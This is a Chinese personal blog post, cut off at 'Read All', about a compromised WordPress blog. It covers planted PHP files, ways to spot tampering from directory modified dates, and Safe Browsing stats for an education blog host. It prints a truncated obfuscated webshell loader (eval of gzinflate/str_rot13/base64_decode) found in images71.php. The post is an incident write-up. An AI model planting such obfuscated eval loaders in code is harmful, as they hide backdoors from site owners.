算是那篇xmlrpc漏洞的后续吧。
检查的时候疏忽了，没有注意别的文件夹。结果发现另一个文件夹下的images文件夹内也被放入了一个images71.php 内容也是加密的。唉，真是无孔不入啊，我是怕了这类玩意了。

注意到一些细节，记录下来。。。
如果改了文件夹名，这个文件夹“Modified Date”会更新。
如果改了文件名，这个文件的“Modified Date”不会更新。
如果在某个文件夹里传入新文件，这个文件夹的“Modified Date”会更新。
如果覆盖某个文件，这个文件的“Modified Date”会更新，包含它的文件夹的“Modified Date”也会更新。

所以检查自己网站是否被动过的简单方法，就是盯着根目录的日期看咯。看完根目录再看一级子目录，日期都没有异常就基本确认OK了。

昨日想去看以前同学的blog，恰好是使用的教育人博客blog.edu.cn上面的。每次打开后ie就报错自动退出。纳闷。。
后来开firefox去看，直接冒出了red alert，点击查看原因，就进入了以下的google分析页面。
真是看得大汗加无语啊。

重点内容有：过去90天，google测试了1735页面，其中595有恶意软件被下载并安装。恶意软件包括1047木马，916程式攻击，298恶意攻击。恶意程序来源自63个域名，其中56个充当了转递恶意程序到这个网站的作用。
这是什么糟糕的安全状况啊，这开放的网络果然很可怕。昨天我又检查了一下自己blog目录下有无奇怪文件。。

查看网上的文章，大多是今年5月的时候。我那时却少了根经，处于不闻不问的状态。
结果blog已经被人动了，自己却毫不知觉，直到这几天才惊觉其实已然中招。。。
幸运的是，人家对这里的兴趣也不大，基本上没有做什么破坏性举动。lucky? or not really so...

那时为何会不知觉，是因为只看到一个xmlrpc-g.php的文件。虽然有些纳闷，却也让我疏忽了。我就没有去做任何改动。直到一个月左右前，看到这样的文件在blog目录下，images71.php，觉得不对劲。查看其内容也很奇怪，是这样的字样：

<?php
/*
代码由http://1v1.name在线加密! 

*/
eval(gzinflate(str_rot13(base64_decode('FJ3HjqR5tlJfpXT9WAzwQXfdFgTeezd24T1O4OHpLzmtV
...
中间省略n行，共100K左右大小
...
lv+ErdZaX6khNBgiBjRyQAFCAIjiNr/vPPv/79vv733//87/8='))));
?>

一时琢磨不透怎么回事。就把它给保存一份，然后删除掉了。后来在网上爬文，多少明白了是一种木马防杀的手段。通过多次加密，主机就没法杀除这样的病毒或木马。所以说。。。加密的部分多半是木马内容。
明白这点就更有些不放心，好好的查找了

[Read All]